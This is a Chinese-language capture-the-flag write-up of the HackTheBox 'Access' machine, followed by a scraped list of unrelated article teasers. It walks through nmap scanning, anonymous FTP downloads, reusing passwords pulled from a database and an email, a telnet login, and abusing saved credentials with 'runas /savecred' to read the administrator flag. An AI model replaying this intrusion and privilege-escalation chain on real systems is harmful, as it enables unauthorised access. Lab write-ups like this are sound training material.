Hunter网络安全
Hunter网络安全

对HackTheBox里的Access靶场进行测试

首先,我要说这台机器花了我大约6小时来完成整个工作。我掉了几个万恶的坑里,最终的解决方案比我想象的要简单得多。

我的第一步。在新计算机上启动时,几乎总是这样,即执行nmap扫描以查看运行情况。

root@localhost:~/hackthebox/access# nmap -p- -sV -O 10.10.10.98
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 06:02 EST
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.02% done
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 16.93% done; ETC: 06:07 (0:04:30 remaining)
Nmap scan report for 10.10.10.98
Host is up (0.13s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (89%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (89%), Microsoft Windows Phone 7.5 or 8.0 (89%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 683.84 seconds

从输出中我们可以看到有3个服务。Telnet,HTTP和FTP。首先检查HTTP是最简单的方法。所以我浏览到http://10.10.10.98,在其中显示了一个页面,其中包含称为out.jpg的图像,该图像显示了服务器机房的摄像机视图,在上方显示了文本LON-MC6。查看源时,页面上没有任何隐藏的内容。


<html>
<head>
<title>MegaCorptitle>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
head>

<body>
<div align="center">
  <p><strong><font size="5" face="Verdana, Arial, Helvetica, sans-serif">LON-MC6font>strong> p>
  <p><img border="0" src="out.jpg">p>
div>
body>
html>

因为,这似乎暂时还没有到位。接下来,我决定尝试通过使用ncftp进行连接以检查FTP服务:

root@localhost:~# ncftp 10.10.10.98
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).

Copyright (c) 1992-2011 by Mike Gleason.
All rights reserved.

Connecting to 10.10.10.98...
Microsoft FTP Service
Logging in...
User logged in.
Logged in to 10.10.10.98.
ncftp / > dir
connect failed: Connection refused.
connect failed: Connection refused.
connect failed: Connection refused.
Falling back to PORT instead of PASV mode.
List failed.
ncftp / > dir
d---------   1 ftpuser  ftpusers            0 Aug 23  2018 Backups
d---------   1 ftpuser  ftpusers            0 Aug 24  2018 Engineer
ncftp / > cd Backups
ncftp /Backups > dir
----------   1 ftpuser  ftpusers      5652480 Aug 23  2018 backup.mdb
ncftp /Backups > get backup.mdb
backup.mdb:                                              5.39 MB   76.00 kB/s
ncftp /Backups > cd ..
ncftp / > cd Engineer
ncftp /Engineer > dir
----------   1 ftpuser  ftpusers        10870 Aug 24  2018 Access Control.zip
ncftp /Engineer > get "Access Control.zip"
Access Control.zip:                                     10.62 kB    3.66 kB/s
ncftp /Engineer >

FTP服务接受来宾登录,因为它不提示输入密码。它包含两个称为“ Backups and Engineer”的目录,在“ Backups”中具有一个backup.mdb文件,在Engineer我最初尝试使用标准ftp命令而不是ncftp来执行此操作。但是由于某种原因,它不会正确下载备份。 mdb并损坏。因此,出于这个原因,我改用了ncftp,效果很好。然后,我厌倦了解压缩“ Access Control.zip”,但是它受到密码保护。

root@localhost:~# 7z e Access\ Control.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Xeon(R) CPU           L5520  @ 2.27GHz (106A4),ASM)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870


Enter password (will not be echoed):
ERROR: Wrong password : Access Control.pst

Sub items Errors: 1

Archives with Errors: 1

Sub items Errors: 1
root@localhost:~#

然后,我将backup.mdb复制到我的Windows计算机上,并使用一些名为MDB Viewer的免费软件打开了该文件。该文件包含许多我搜索过的表。看上去很重要的一个表称为auth_user,其中包含3个用户/密码组合。我对“ Access Control.zip”上的每个密码都感到疲倦,密码access4u @ security可以解压缩并提取其中的PST文件。
对HackTheBox里的Access靶场进行测试_第1张图片
PST文件是交换邮箱的存储文件。我将PST文件导入到Thunderbird中,这使我可以查看文件中包含的电子邮件。
对HackTheBox里的Access靶场进行测试_第2张图片

From "[email protected]" Thu Aug 23 23:44:07 2018
Status: RO
From: [email protected] 
Subject: MegaCorp Access Control System "security" account
To: '[email protected]'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--boundary-LibPST-iamunique-1048588502_-_-"


----boundary-LibPST-iamunique-1048588502_-_-
Content-Type: multipart/alternative;
        boundary="alt---boundary-LibPST-iamunique-1048588502_-_-"

--alt---boundary-LibPST-iamunique-1048588502_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,



The password for the "security" account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.



Regards,

John

我的下一步是通过使用电子邮件中提供的附加进行连接,检查nmap找到的最终Telnet服务。

ec2-user@kali:~/Documents/access$ telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>

一个用户标志存储在c:\ Users \ security \ Desktop \ user.txt中,一个根标志存储在c:\ Users \ security \ Desktop \ user.txt中。因此,我将其CD到桌面,将user.txt的内容输出到命令行。

C:\Users\security>cd Desktop

C:\Users\security\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\Desktop

08/28/2018  06:51 AM              .
08/28/2018  06:51 AM              ..
08/21/2018  10:37 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  16,768,454,656 bytes free

C:\Users\security\Desktop>type user.txt
{
     {
     REDACTED}}
C:\Users\security\Desktop>

因此,我们现在已经成功获取了用户标志。下一步是获取根标志。这是我花了最多的时间实现的目标。我花了很长时间尝试尝试上载并运行Shell并使用ZKAccess3.5程序执行权限升级,但是这些允许成功。最后一个功能的方法是使用runas命令。这允许您以其他用户的身份从命令行运行某些内容。因此,我本质上想做的就是运行命令“键入c:\ Users \ Administrator \桌面\ root.txt”。作为管理员。我最初尝试立即运行“ runas /用户:管理员”类型c:\用户\管理员\桌面\ root.txt。此问题是Runas产生了第二个窗口来运行命令并输出结果。所以您不会在窗口中看到输出。

C:\Users\security>runas /user:administrator "type c:\Users\Administrator\Desktop\root.txt""
Enter the password for administrator:

我尝试输入在backup.mdb中找到的其他密码,但是没有一个动作。我发现的是runas命令的一个选项,它允许您为用户使用保存的替代。因此,如果管理员帐户的替换保存在Windows可以使用管理员身份运行命令,而无需手动输入密码。这是通过使用/ savecred开关完成的。我发现再次使用了它,本来应该是root.txt的内容(root标志)的输出也是空白的。这是由于该命令在telnet会话之外的另一个视图中运行。经过大量的猜测和操作后,我发现以下命令启动了,从而允许我运行所需的命令变为结果输出到txt文件中,可以在当前会话中查看该文件。

C:\Users\security>runas /savecred /user:administrator "cmd /k type c:\Users\Administrator\Desktop\root.txt > c:\Users\security\bbdd.txt"

C:\Users\security>type bbdd.txt
{
     {
     REDACTED}}

如您所见,此操作成功完成,我能够以管理员身份执行命令并读取root.txt的内容。

关注:Hunter网络安全 获取更多资讯
网站:bbs.kylzrv.com
CTF团队:Hunter网络安全
文章:Xtrato
排版:Hunter-匿名者

你可能感兴趣的:(技术,nmap,安全,经验分享,pwn,其他)

  • Pandas-为什么 Polars 比 Pandas 使用更少的内存 李星星BruceL 自动化测试pandaspython
    目录为什么Polars比Pandas使用更少的内存使用Pandas处理大量数据可能会很困难;很容易耗尽内存,导致程序变慢甚至崩溃。Polars数据框库是一个潜在的解决方案。虽然Polars主要以比Pandas运行更快而闻名,但如果使用得当,它有时也可以显著减少内存使用。特别是,某些在Pandas中需要手动完成的技术可以在Polars中自动完成,从而让你在处理大型数据集时使用更少的内存——并且减少你
  • 大龄IT从业人员如何实现大厂梦之三(终结篇) 繁华之中悟静 职场和发展求职招聘职场发展
    引言:大龄IT从业者的年龄是求职过程中不得不面对的一个关键问题。为此,基于行业现状和公开案例整理了对大龄IT从业者应对年龄问题的具体建议,分为求职策略、职业规划、技能提升和心态调整四部分。本篇是大龄IT从业人员如何实现一线大厂高薪梦系列文章的最后一篇。一、求职策略:突出不可替代性精准定位岗位技术专家/架构师:专注某一领域(如云计算、AI),通过开源贡献、技术博客或行业认证(如HCIE、TOGAF、
  • 329.大学生HTML期末大作业 —【纪念鲁迅文化主题网页】 Web前端网页制作 html+css 一只小小的眠羊 大学生期末大作业文化前端html课程设计javascripthtml5cssjquery
    目录一、更多推荐二、网页简介三、网页文件四、网页效果五、代码展示1.html2.CSS六、总结1.简洁实用2.使用方便3.整体性好4.形象突出5.交互式强一、更多推荐欢迎来到我的CSDN主页!您的支持是我创作的动力!Web前端网页制作、网页完整代码、大学生期末大作业案例模板完整代码、技术交流等,有兴趣的联系我交流学习!更多优质博客文章、网页模板点击以下链接查阅:仙女网页设计-CSDN博客5000+
  • 异步IO时代的颠覆者:深入探讨io_uring 深度Linux C/C++全栈开发Linux进程管理linuxC/C++异步IO
    大家好,我是深度Linux,今天我们将一同踏入Linux操作系统中一个令人兴奋的领域io_uring。在当今这个对计算性能和效率不断追求极致的时代,高效的输入输出(I/O)操作成为了决定系统整体表现的关键因素之一。Linux作为广泛应用于服务器、云计算、嵌入式系统等众多领域的强大操作系统,一直在不断探索和创新I/O技术,以满足日益增长的性能需求。而io_uring正是Linux在异步I/O方面的一
  • ZooKeeper 的 Watch 机制是什么? Shockang 大数据技术体系大数据zookeeper
    前言本文隶属于专栏《1000个问题搞定大数据技术体系》,该专栏为笔者原创,引用请注明来源,不足和错误之处请在评论区帮忙指出,谢谢!本专栏目录结构和参考文献请见1000个问题搞定大数据技术体系正文Watch机制的简介ZooKeeper提供了分布式数据发布/订阅功能,一个典型的发布/订阅模型系统定义了一种一对多的订阅关系,能让多个订阅者同时监听某一个主题对象,当这个主题对象自身状态变化时,会通知所有订
  • 网络安全工程师的职业规划?(非常详细),零基础入门到精通,看这一篇就够了_网络工程师职业决策 QXXXD web安全网络安全数据库学习
    文章目录前言一、就业工作岗位众多网络工程师的个人职业规划一、网络工程师的职业优势二、网络工程师解读计算机网络安全工程师怎么发展职业规划文末福利前言网络安全专业网络安全专业就业前景怎么样?有哪些就业方向?一、就业工作岗位众多网络安全专业毕业生就业的岗位较多,可以在计算机科学与技术、信息通信、电子商务、互联网金融、电子政务等领域从事相关工作。也可以在***机关事业单位,银行、保险、证券等金融机构,电信
  • 明达云平台赋能车间设备管理 明达技术 运维自动化
    在工业4.0浪潮席卷全球的今天,制造业正经历着前所未有的数字化转型。传统车间设备管理模式因数据孤岛、响应滞后等痛点,已难以满足企业高效运营与智能化升级的需求。而明达技术基于工业物联网(IIoT)的明达云平台解决方案,正成为破解这一困局的关键——它通过实时数据采集、智能分析与远程协作,让设备管理从"被动维护"转向"主动优化",为企业降本增效注入强劲动力。数据可视化:让设备状态一目了然传统车间设备管理
  • 高并发场景下的UDP协议设计与实现:基于并发容器的实践 KBkongbaiKB udp网络协议网络
    引言:为什么需要并发容器处理UDP?在实时通信、物联网(IoT)、在线游戏等场景中,UDP协议因其低延迟和无连接特性被广泛使用。但当每秒需处理数万甚至百万级数据包时,如何保证线程安全与高效处理成为核心挑战。本文将结合并发容器,探讨如何构建高性能UDP服务端。一、UDP协议核心特性回顾1.1UDPvsTCP特性UDPTCP连接方式无连接面向连接可靠性不保证数据到达可靠传输头部开销8字节20-60字节
  • 网络安全创刊 网络安全紫队 Hacker_Fuchen web安全网络安全
    目录基本概念攻防演习准备工作组织要素组织形式组织关键攻防演习不同阶段组织策划阶段前期准备阶段实战演习阶段应急演习阶段演习总结阶段演习风险规避措施如果错过互联网,与你擦肩而过的不仅仅是机会,而是整整一个时代。基本概念组织方。在演习中,负责演习组织,过程监控,技术指导,应急保障,风险控制,演习总结,技术措施与策略优化等工作。通过红蓝攻防检验参演单位安全威胁应对能力,攻击事件检测发现能力。事件分析研判能
  • 年末网络安全检查的清单 网络安全King web安全网络安全
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快《网络空间安全导论》第4、7(2)章第4章系统安全4.1操作系统概述计算机操作系统的功能包括:进程管理、内存管理、设备管理、文件管理、用户接口。4.2操作系统安全4.2.1操作系统的安全威胁与脆弱性操作系统的安全威胁包括:非法用户或假冒用户入侵系统、数据被非法破坏或者数据丢失、不明病毒的破坏和黑客入侵、操作系统运行不正常。操作系统的脆弱性
  • 网络安全 如何构建DMZ区 网络安全King web安全安全
    点击文末小卡片,免费获取网络安全全套资料,资料在手,涨薪更快当整个世界都越来越离不开网络,那么网络安全自然也就成为了重中之重。特别是那些曾经遭受过黑客攻击的企业,想必对于这一点的感受更是尤其深刻。7月31日,卡巴斯基实验室主办的“CyberInsights2018”网络安全大会在北京举行。本次大会是卡巴斯基实验室亚太区首届多城市“CyberInsights2018”安全路演系列活动,首发两站台北及
  • 时序数据库 TDengine 化工新签约:存储降本一半,查询提速十倍 涛思数据(TDengine) 时序数据库tdengine人工智能
    化工行业在数字化转型过程中面临数据接入复杂、实时性要求高、系统集成难度大等诸多挑战。福州力川数码科技有限公司科技依托深厚的行业积累,精准聚焦行业痛点,并携手TDengine提供高效解决方案。通过应用TDengine,力川科技助力化工企业实现了海量数据的低成本、高效存储与处理,同时达到了毫秒级实时监控,为安全生产和智能决策提供强有力的支撑。具体来说,本次合作不仅使存储成本降低50%以上,查询效率提升
  • 一体式 IO 模块助力 PLC,开启纺织机自动化高效新篇章 明达技术 自动化运维
    在当下纺织行业竞争愈发激烈的大环境中,提升生产效率、降低运营成本成为企业在市场中脱颖而出的关键。传统纺织机依赖人工操作和离散控制的模式,不仅效率低下,还存在诸多问题,如设备停机频繁、能耗居高不下、维护成本不断攀升等。而随着工业自动化技术的飞速发展,明达技术推出MR20一体式IO模块与PLC的深度融合,为纺织机实现高效连续自动化作业提供了创新且可行的解决方案。传统困境多设备协同难题:纺织生产流程包含
  • C# WPF 为何能成为工控上位机开发的首选 zls365365 c#wpf开发语言
    C#WPF(WindowsPresentationFoundation)因其强大的功能和灵活性,成为了工控上位机开发的首选技术之一。WPF提供了丰富的控件、图形和动画效果,以及与硬件设备的交互能力,非常适合用来构建复杂的工业自动化和监控系统。以下是一些关键因素,解释了为什么WPF能在工控上位机开发中占据重要地位,并提供了一些实例代码来展示其应用。1.强大的数据绑定和MVVM支持WPF支持MVVM(
  • Manus要邀请码?来试试 OpenManus:纯开源AI Agent 神器+简单三步上手实战指南 大F的智能小课 DeepSeek技术解析和实战大模型理论和实战人工智能深度学习机器学习
    大家好,我是大F,深耕AI算法十余年,互联网大厂技术岗。分享AI算法干货、技术心得。更多文章可关注《大模型理论和实战》、《DeepSeek技术解析和实战》,一起探索技术的无限可能!一、Manus介绍Manus(拉丁语"手脑并用")作为全球首款通用型AIAgent,其核心突破在于实现了从"被动响应"到"主动执行"的跨越。与传统AI助手不同,它通过多智能体架构在云端虚拟机中运行,能自主调用浏览器、代码
  • Docker资料整理 小冀在努力 JAVA学习之路docker
    目录Docker概述:Docker的基于CentOs7的安装方法可百度或看其他作者文档Docker的架构:Docker的基本操作镜像操作:容器操作:数据卷操作Dockerfile自定义镜像DockerComposeDocker私有仓库搭建Docker概述:内核与硬件交互,提供操作硬件的指令系统应用封装内核指令为函数,便于程序员调用用户程序基于系统函数库实现功能Docker运行到不同操作系统时,直接
  • 为什么要开源? 互联网之路. 知识点开源
    互联网各领域资料分享专区(不定期更新):Sheet正文开源(OpenSource)是软件、硬件或知识产品将其源代码或设计公开,允许任何人自由使用、修改和分发的模式。开源的核心不仅是“免费”,更是一种协作和透明的理念。以下是开源的主要动因和优势:一、技术驱动:提升质量和创新1、集体智慧与协作开源允许全球开发者共同贡献代码,通过“同行评审”快速发现和修复漏洞,提高软件质量(如Linux内核、Apach
  • 清华团队发布多模态“神探”Migician:24.94%性能碾压,解锁多图定位的无限可能—— 安防、自动驾驶、医疗影像的AI“鹰眼”革命 花生糖@ AIGC学习资料库人工智能自动驾驶机器学习
    引言:当AI学会“跨图追凶”2025年,安防监控摄像头每天产生3.5万亿帧画面,自动驾驶汽车每秒处理20路传感器图像,医疗影像科医生年均分析50万张CT片——多图像定位能力已成为AI落地的命门。清华大学联合北交大、华中科大发布的Migician模型,凭借24.94%的性能碾压优势,让AI首次实现“跨图像精准狙击”。这个突破性工具,正在重新定义从安防到医疗的20+行业规则。一、技术深析:Migici
  • 智邦国际ERP软件实施成功的七大步骤 soywp51 erp实施操作步骤智邦国际erp
    ERP系统实施指的是利用ERP软件将企业用户的管理制度与信息化技术相结合的一种过程,为解决用户的实际管理问题而提供的服务。ERP系统实施往往需要在管理系统和实际工作之间寻求妥协,具有相当大的难度,因此有些企业ERP实施是失败的。所以要对ERP实施做足充分的准备工作,智邦国际小编在此准备了实施流程借以参考。第一步:公司决策层确认大方向每家企业都有各自的管理流程,很少能与ERP系统完全一致。此时决策层
  • DeepSeek时代:AI如何重塑软件开发的每个阶段,效率提升全解析 阿三0404 人工智能
    在软件开发领域,时间就是竞争力。传统的瀑布模型和敏捷开发流程中,需求偏差、重复编码、测试遗漏等问题不断消耗团队精力。随着以DeepSeek为代表的AI技术突破,从需求分析到运维监控的每个环节都在发生效率革命。本文将深入解析AI在开发全流程中的具体应用,并通过真实数据揭示其带来的效率跃升。一、需求分析阶段:从模糊需求到精准拆解(效率提升65%)AI工具:自然语言处理(NLP)、需求图谱生成应用场景:
  • 钉钉宜搭智能车辆管理系统:AIoT与低代码融合的数字化解决方案 阿三0404 钉钉低代码
    一、系统架构设计1.四层技术架构graphTDA[智能硬件层]-->B[数据传输层]B-->C[业务逻辑层]C-->D[应用交互层]subgraphA[智能硬件层]A1(OBD设备)-->|CAN总线协议|A2(发动机状态)A3(GPS定位器)-->|北斗/GPS双模|A4(实时轨迹)A5(NFC识别器)-->|ISO14443协议|A6(驾驶员认证)endsubgraphB[数据传输层]B1(钉
  • ‌HTTP/1.0、HTTP/2.0和HTTP/3.0的区别 www.www 计算机基础知识http网络协议网络
    ‌HTTP/1.0、HTTP/2.0和HTTP/3.0的区别HTTP/1.0HTTP/2.0HTTP/3.0(QUIC)在应用中,HTTP/1.0、HTTP/2.0和HTTP/3.0的主要区别在于连接方式,性能优化,头部压缩,安全性及数据传输等方面HTTP/1.0HTTP/1.0是第一个被广泛使用的HTTP协议版本,发布于1996年。主要特点包括:非持久连接‌:每个请求都使用一个独立的TCP连接,
  • 网络安全工程师的职业规划?(非常详细),零基础入门到精通,看这一篇就够了 网络安全小宇哥 web安全安全网络网络安全计算机网络
    文章目录前言一、就业工作岗位众多网络工程师的个人职业规划一、网络工程师的职业优势二、网络工程师解读计算机网络安全工程师怎么发展职业规划文末福利前言网络安全专业网络安全专业就业前景怎么样?有哪些就业方向?一、就业工作岗位众多网络安全专业毕业生就业的岗位较多,可以在计算机科学与技术、信息通信、电子商务、互联网金融、电子政务等领域从事相关工作。也可以在***机关事业单位,银行、保险、证券等金融机构,电信
  • 神笔上货:拼多多上货软件-多种上传模式-模拟人工上传-防比价 mayiskk macos
    图片制作:蚂蚁电商文章编辑:蚂蚁的王技术指导:见下方在电商竞争激烈的今天,如何高效、准确地将商品上架,成为了商家们关注的焦点。今天,我们向大家介绍一款拼多多上货的新利器——神笔上货软件。神笔上货软件具备多种上传模式,无论是批量上传还是单个商品上传,都能轻松应对。它能够自动识别商品信息,并根据商家的需求进行智能分类和整理。此外,该软件还模拟了人工上传的操作流程。这不仅提高了上货的效率,还能有效防止平
  • C/C++ | 每日一练 (1) 张胤尘 C/C++每日一练c语言c++面试
    欢迎来到张胤尘的技术站技术如江河,汇聚众志成。代码似星辰,照亮行征程。开源精神长,传承永不忘。携手共前行,未来更辉煌文章目录C\C++|每日一练(1)题目参考答案C\C++|每日一练(1)题目C是否支持函数重载?C++是否支持函数重载?如果支持请简述函数重载的实现原理。参考答案C不支持函数重载在C语言中,函数的名称必须是唯一的。如果尝试定义两个同名的函数,即使参数列表不同,编译器也会报错。这是因为
  • 电商数据采集的网页抓取数据、淘宝、天猫、京东等平台的电商数据抓取|电商数据API接口网页爬虫、采集网站... IT黑侠-itheixia python爬虫数据采集AI爬虫
    ###电商数据采集技术解析随着电子商务的快速发展,电商数据的采集和分析成为了企业决策的重要依据。无论是淘宝、天猫、京东等大型电商平台,还是其他中小型电商网站,数据采集技术都扮演着至关重要的角色。本文将探讨电商数据采集的常见方法、技术挑战以及解决方案。####电商数据采集的常见方法1.**网页爬虫技术**网页爬虫是电商数据采集的核心技术之一。通过编写爬虫程序,可以自动访问目标网站,抓取商品信息、价格
  • zl-docx2html:将文档转换为网页的利器 石喜宏Melinda
    zl-docx2html:将文档转换为网页的利器zl-docx2html项目地址:https://gitcode.com/gh_mirrors/zl/zl-docx2html在现代技术文档管理中,将文档转换为网页格式是一项常见需求。无论是为了方便在线阅读、版本控制,还是为了更好地集成到网站或内部系统中,文档的网页化处理都显得尤为重要。今天,我们将向您推荐一款强大的开源工具——zl-docx2htm
  • 鸿蒙HarmonyOS NEXT开发:ArkUI高性能开发-(组件复用最佳优化实践) 小叮当QAQ HarmonyOSNEXT开发ArkUI-性能优化harmonyos华为android嵌入式硬件驱动开发
    往期鸿蒙全套实战精彩文章必看内容:鸿蒙开发核心知识点,看这篇文章就够了最新版!鸿蒙HarmonyOSNext应用开发实战学习路线鸿蒙HarmonyOSNEXT开发技术最全学习路线指南鸿蒙应用开发实战项目,看这一篇文章就够了(部分项目附源码)概述若开发者的应用中存在以下场景,并成为UI线程的帧率瓶颈,应该考虑使用组件复用机制提升应用性能:列表滚动(本例中的场景):当应用需要展示大量数据的列表,并且用
  • 深度剖析QwQ模型:技术、应用与前景展望 萧十一郎@ python人工智能
    目录一、引言1.1研究背景与目的1.2研究意义1.3研究方法与创新点二、QwQ模型的基本概述2.1定义与概念2.2发展历程2.3模型架构与原理2.3.1整体架构2.3.2关键技术与原理三、QwQ模型的性能表现3.1数学推理能力3.1.1AIME24评测集表现3.1.2实际案例分析3.2编程能力3.2.1LiveCodeBench评估结果3.2.2代码生成案例展示3.3通用能力测试3.3.1常识推理
  • 《C# using关键字全面解析:资源管理 × 命名空间 × 避坑指南》 Ro小陌 C#数据库开发语言c#数据库开发语言
    在C#中,using是一个多功能的关键字,主要用于资源管理和命名空间引用。以下是它的两种核心用法和扩展特性:一、using指令(命名空间引用)作用:简化代码中对其他命名空间下类型的访问,避免写冗长的完全限定名。1.基本用法csharpusingSystem;//引入System命名空间usingSystem.IO;//引入文件操作相关类classProgram{staticvoidMain(){C
  • 二分查找排序算法 周凡杨 java二分查找排序算法折半
    一:概念 二分查找又称 折半查找( 折半搜索/ 二分搜索),优点是比较次数少,查找速度快,平均性能好;其缺点是要求待查表为有序表,且插入删除困难。因此,折半查找方法适用于不经常变动而 查找频繁的有序列表。首先,假设表中元素是按升序排列,将表中间位置记录的关键字与查找关键字比较,如果两者相等,则查找成功;否则利用中间位置记录将表 分成前、后两个子表,如果中间位置记录的关键字大于查找关键字,则进一步
  • java中的BigDecimal bijian1013 javaBigDecimal
            在项目开发过程中出现精度丢失问题,查资料用BigDecimal解决,并发现如下这篇BigDecimal的解决问题的思路和方法很值得学习,特转载。         原文地址:http://blog.csdn.net/ugg/article/de
  • Shell echo命令详解 daizj echoshell
    Shell echo命令 Shell 的 echo 指令与 PHP 的 echo 指令类似,都是用于字符串的输出。命令格式: echo string 您可以使用echo实现更复杂的输出格式控制。 1.显示普通字符串: echo "It is a test" 这里的双引号完全可以省略,以下命令与上面实例效果一致: echo Itis a test 2.显示转义
  • Oracle DBA 简单操作 周凡杨 oracle dba sql
    --执行次数多的SQL select sql_text,executions from (      select sql_text,executions from v$sqlarea order by executions desc      ) where rownum<81;  &nb
  • 画图重绘 朱辉辉33 游戏
      我第一次接触重绘是编写五子棋小游戏的时候,因为游戏里的棋盘是用线绘制的,而这些东西并不在系统自带的重绘里,所以在移动窗体时,棋盘并不会重绘出来。所以我们要重写系统的重绘方法。   在重写系统重绘方法时,我们要注意一定要调用父类的重绘方法,即加上super.paint(g),因为如果不调用父类的重绘方式,重写后会把父类的重绘覆盖掉,而父类的重绘方法是绘制画布,这样就导致我们
  • 线程之初体验 西蜀石兰 线程
    一直觉得多线程是学Java的一个分水岭,懂多线程才算入门。 之前看《编程思想》的多线程章节,看的云里雾里,知道线程类有哪几个方法,却依旧不知道线程到底是什么?书上都写线程是进程的模块,共享线程的资源,可是这跟多线程编程有毛线的关系,呜呜。。。 线程其实也是用户自定义的任务,不要过多的强调线程的属性,而忽略了线程最基本的属性。 你可以在线程类的run()方法中定义自己的任务,就跟正常的Ja
  • linux集群互相免登陆配置 林鹤霄 linux
    配置ssh免登陆 1、生成秘钥和公钥    ssh-keygen -t rsa 2、提示让你输入,什么都不输,三次回车之后会在~下面的.ssh文件夹中多出两个文件id_rsa 和 id_rsa.pub    其中id_rsa为秘钥,id_rsa.pub为公钥,使用公钥加密的数据只有私钥才能对这些数据解密    c
  • mysql : Lock wait timeout exceeded; try restarting transaction aigo mysql
    原文:http://www.cnblogs.com/freeliver54/archive/2010/09/30/1839042.html   原因是你使用的InnoDB   表类型的时候, 默认参数:innodb_lock_wait_timeout设置锁等待的时间是50s, 因为有的锁等待超过了这个时间,所以抱错.   你可以把这个时间加长,或者优化存储
  • Socket编程 基本的聊天实现。 alleni123 socket
    public class Server { //用来存储所有连接上来的客户 private List<ServerThread> clients; public static void main(String[] args) { Server s = new Server(); s.startServer(9988); } publi
  • 多线程监听器事件模式(一个简单的例子) 百合不是茶 线程监听模式
        多线程的事件监听器模式   监听器时间模式经常与多线程使用,在多线程中如何知道我的线程正在执行那什么内容,可以通过时间监听器模式得到        创建多线程的事件监听器模式 思路:    1, 创建线程并启动,在创建线程的位置设置一个标记     2,创建队
  • spring InitializingBean接口 bijian1013 javaspring
    spring的事务的TransactionTemplate,其源码如下: public class TransactionTemplate extends DefaultTransactionDefinition implements TransactionOperations, InitializingBean{ ... } TransactionTemplate继承了DefaultT
  • Oracle中询表的权限被授予给了哪些用户 bijian1013 oracle数据库权限
            Oracle查询表将权限赋给了哪些用户的SQL,以备查用。 select t.table_name as "表名", t.grantee as "被授权的属组", t.owner as "对象所在的属组"
  • 【Struts2五】Struts2 参数传值 bit1129 struts2
    Struts2中参数传值的3种情况 1.请求参数绑定到Action的实例字段上 2.Action将值传递到转发的视图上 3.Action将值传递到重定向的视图上   一、请求参数绑定到Action的实例字段上以及Action将值传递到转发的视图上 Struts可以自动将请求URL中的请求参数或者表单提交的参数绑定到Action定义的实例字段上,绑定的规则使用ognl表达式语言
  • 【Kafka十四】关于auto.offset.reset[Q/A] bit1129 kafka
    I got serveral questions about  auto.offset.reset. This configuration parameter governs how  consumer read the message from  Kafka when  there is no initial offset in ZooKeeper or
  • nginx gzip压缩配置 ronin47 nginx gzip 压缩范例
    nginx gzip压缩配置 更多 0 nginx gzip 配置   随着nginx的发展,越来越多的网站使用nginx,因此nginx的优化变得越来越重要,今天我们来看看nginx的gzip压缩到底是怎么压缩的呢? gzip(GNU-ZIP)是一种压缩技术。经过gzip压缩后页面大小可以变为原来的30%甚至更小,这样,用
  • java-13.输入一个单向链表,输出该链表中倒数第 k 个节点 bylijinnan java
    two cursors. Make the first cursor go K steps first. /* * 第 13 题:题目:输入一个单向链表,输出该链表中倒数第 k 个节点 */ public void displayKthItemsBackWard(ListNode head,int k){ ListNode p1=head,p2=head;
  • Spring源码学习-JdbcTemplate queryForObject bylijinnan javaspring
    JdbcTemplate中有两个可能会混淆的queryForObject方法: 1. Object queryForObject(String sql, Object[] args, Class requiredType) 2. Object queryForObject(String sql, Object[] args, RowMapper rowMapper) 第1个方法是只查
  • [冰川时代]在冰川时代,我们需要什么样的技术? comsci 技术
         看美国那边的气候情况....我有个感觉...是不是要进入小冰期了?      那么在小冰期里面...我们的户外活动肯定会出现很多问题...在室内呆着的情况会非常多...怎么在室内呆着而不发闷...怎么用最低的电力保证室内的温度.....这都需要技术手段...   &nb
  • js 获取浏览器型号 cuityang js浏览器
    根据浏览器获取iphone和apk的下载地址 <!DOCTYPE html> <html> <head>     <meta charset="utf-8" content="text/html"/>     <meta name=
  • C# socks5详解 转 dalan_123 socketC#
